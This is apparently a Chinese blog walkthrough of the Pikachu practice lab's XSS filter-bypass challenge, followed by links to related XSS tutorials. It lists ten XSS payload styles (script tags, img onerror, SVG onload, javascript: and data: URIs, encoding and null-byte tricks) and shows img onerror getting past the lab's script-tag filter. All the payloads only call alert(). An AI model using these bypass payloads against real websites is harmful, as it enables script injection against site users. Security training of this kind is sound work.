Picachu xss之过滤

最新推荐文章于 2024-11-05 14:30:57 发布
最新推荐文章于 2024-11-05 14:30:57 发布
阅读量386 收藏 6
点赞数 7
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SS_liang/article/details/135442114
版权

先介绍几个xss语句:

  1. 注入脚本:

    • 在输入字段中插入JavaScript代码。
    • 示例:<script>alert('XSS')</script>

  2. 嵌套标签:

    • 利用嵌套标签来绕过过滤机制。
    • 示例:<img src='x' onerror='alert("XSS")'>

  3. 事件处理器:

    • 利用HTML标签的事件处理器来执行JavaScript代码。
    • 示例:<img src="x" onmouseover="alert('XSS')">

  4. 使用特殊字符:

    • 利用HTML和JavaScript的特殊字符来绕过过滤。
    • 示例:<s%00c%00r%00i%00p%00t>alert('XSS')</script>

  5. 编码绕过:

    • 利用HTML编码或JavaScript编码来混淆代码。
    • 示例:&#x3C;script&#x3E;alert('XSS')&#x3C;/script&#x3E;

  6. 嵌套注释:

    • 在注释中插入恶意代码。
    • 示例:<img src="x" onerror="alert('XSS') //">

  7. JavaScript伪协议:

    • 利用JavaScript伪协议来执行JavaScript代码。
    • 示例:javascript:alert('XSS')

  8. 数据协议:

    • 利用data协议来执行JavaScript代码。
    • 示例:<img src="data:image/svg+xml,<svg/onload=alert('XSS')>">

  9. SVG注入:

    • 利用SVG标签来注入JavaScript代码。
    • 示例:<svg/onload=alert('XSS')>

  10. 基于事件的攻击:

    • 利用用户交互事件触发XSS。
    • 示例:<input type="text" autofocus onfocus="alert('XSS')"

先直接进行注入<script>alert('XSS')</script>

可以看到只返回了>,说明存在过滤:

如果想要确定过滤了哪些东西,我们可以使用一些字典,再用burpsuite来确定过滤了哪些东西:

当然,我这里做了简单的演示:

<*script 这些被过滤了,但是我们还有许多其他的注入方式:

比如上面的嵌套标签<img src='x' onerror='alert("XSS")'>

  • src='x':指定图像的源,这里使用了一个不存在的图像文件 'x'。这通常是为了触发onerror事件,因为图像加载失败会触发onerror
  • onerror='alert("XSS")':在图像加载失败时,会执行JavaScript代码,弹出一个对话框,内容为 "XSS"。

拿下!

zTale
关注
Pikachu靶场-xss详解
qq_53083285的博客
10-30 7782
Picachu靶场-xss跨站脚本漏洞概述跨站脚本漏洞类型及测试流程反射型XSS(post&get)存储型XSSDom型XSSxss-获取cookiexss-进行钓鱼xss-获取键盘记录xss盲打xss过滤和绕过xss输出在href和js中的案例xss的防范措施 XSS-跨站脚本漏洞目录 跨站脚本漏洞概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS;
pikachu---XSS漏洞
m0_52822871的博客
08-31 648
实验环境–pikachu靶机 (记录学习笔记) 一 XSS概述 1.XSS定义 •人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。 •跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。 2.XSS原理
Pikachu-XSS通关攻略
qq_65852138的博客
08-22 675
Pikachu-XSS通关攻略
pikachu靶场第五关——XSS(跨站脚本)之反射型xss(get)(附代码审计)
yzasts的博客
03-18 1539
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
pikachu--xss
鲨鱼辣椒的博客
05-12 4943
XSS概述 XSS全称跨站脚本(Cross Site Scripting)是web中最为常见的漏洞之一,也是危害特别大的一种漏洞,一直高居漏洞排行榜的前几名。XSS漏洞的成因是没有对WEB前端的输入边界尽心严格的过滤,造成攻击者可以通过构造脚本语言使得输入的内容被当成正常的HTML来执行(类似于SQL注入),从而产生危害。xss漏洞危害的对象主要是前端用户,并且可以用来进行钓鱼、前端js挖矿、用户cookie获取、甚至可以结合浏览器自身的漏洞对主机进行远程控制等。 XSS(窃取cookie)攻击流程 .
皮卡丘(pikachu)靶场XSS漏洞练习
criminal_1的博客
02-06 526
皮卡丘(pikachu)靶场XSS漏洞练习
谜团靶机writeup - Pikachu靶场通关指南-上
小龙人
01-24 3369
pikachu靶场
pikachu靶场通关技巧详解
henghengzhao_的博客
10-13 7625
pikachu靶场全部漏洞详解,不懂可以留言,作者会及时回复
pikachu靶场分析笔记
RestoreJustice的博客
03-16 1019
敏感信息泄露虽然一直被评为危害比较低的漏洞,但这些敏感信息往往给攻击着实施进一步的攻击提供很大的帮助,甚至“离谱”的敏感信息泄露也会直接造成严重的损失。测试发现,这里输入kobe可以显示,输入kobe’ and 1=1#时也显示,但输入kobe’ and 1=2#时显示不存在,说明,kobe肯定为真的,只要and后面也为真,则返回kobe结果。这样就不会刷新验证码。只要我们爆破时,把上一次的请求响应包中的token值当作这一次的token一起提交到服务端即可完成token验证,也就达到了爆破的目的。
xss特殊字符拦截与过滤
04-01
标题《xss特殊字符拦截与过滤》以及描述《滤除content中的危险HTML代码,主要是脚本代码,滚动字幕代码以及脚本事件处理代码》提示我们这个文件内容是关于XSS(跨站脚本攻击)防护的编程实现。XSS攻击是指攻击者通过...
Springboot配置XSS过滤XssFilter.zip
12-31
直接可以运行,包含测试类,对HTML和SQL进行过滤,方便扩展。并且可以配置不拦截的路径,包含注释,方便学习。 博客地址:https://blog.csdn.net/u011974797/article/details/121792680
基于Java的高级XSS攻击过滤器设计源码
04-08
高级XSS攻击过滤器 - 基于Java开发,包含33个文件,如XML、JAVA、GITIGNORE、NAME和IML等。该系统实现了一个有选择地过滤XSS攻击代码的功能,通过Java技术实现界面交互和功能模块,为用户提供了一个高效、安全的XSS...
php实现XSS安全过滤的方法
10-23
在PHP中,XSS攻击是常见的网络安全问题之一,其攻击方式主要是通过在网页中嵌入恶意脚本代码。这通常发生在用户提交的数据被信任的Web页面展示时,攻击脚本被其他用户在浏览器中执行,从而导致用户信息泄露、网站被...
JSP使用过滤器防止Xss漏洞
10-17
本文将详细介绍如何使用过滤器(Filter)在JSP中有效地防止XSS攻击。 首先,我们需要了解XSS攻击的基本原理。当用户在Web表单中输入数据,这些数据未经适当的验证和编码直接显示在页面上时,攻击者可以通过注入恶意...
【Pikachu靶场:XSS系列】xss过滤xss之htmlspecialchars,xss之herf输出,xss之js输出通关啦
m0_47484034的博客
11-05 290
【Pikachu靶场:XSS系列】xss过滤xss之htmlspecialchars,xss之herf输出,xss之js输出通关啦
XSS跨站脚本攻击的实现原理及讲解
weixin_59571541的博客
11-04 615
XSS攻击的本质是攻击者在web页面插入恶意的script代码(这个代码可以是JS脚本、CSS样式或其他意料之外的代码),当用户浏览该页面时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。反射型XSS通常用于通过邮件或搜索引擎等将带有XSS攻击代码的链接投放给用户,用户点击链接后,页面会从URL上取出对应的参数,渲染到页面上,此时攻击代码将会被执行。2. **脚本在用户浏览器中执行**:一旦恶意脚本被注入到受害者的网页中,它将在用户浏览器中执行,攻击者可利用此执行环境进行进一步攻击。
【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
最新发布
m0_47484034的博客
11-05 120
【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
XSS(Cross - Site Scripting,跨站脚本攻击)是一种常见的网络安全漏洞
huanghm88的专栏
10-31 1127
XSS(Cross - Site Scripting,跨站脚本攻击)是一种常见的网络安全漏洞,以下是对它的详细介绍:&"'
ctfshow--xss靶场web327-web333(一命速通不了的靶场)
2302_79590880的博客
11-01 714
无法一payload速通的ctfshow xss部分靶场
JavaScript XSS过滤与测试代码详解
标题中提到的"JavaScript中的XSS过滤"是防止XSS攻击的关键策略之一。JavaScript是Web开发中广泛使用的语言,它在构建动态和交互性网页时起着重要作用。然而,由于JavaScript代码可以直接在用户浏览器中执行,攻击者...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

zTale

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值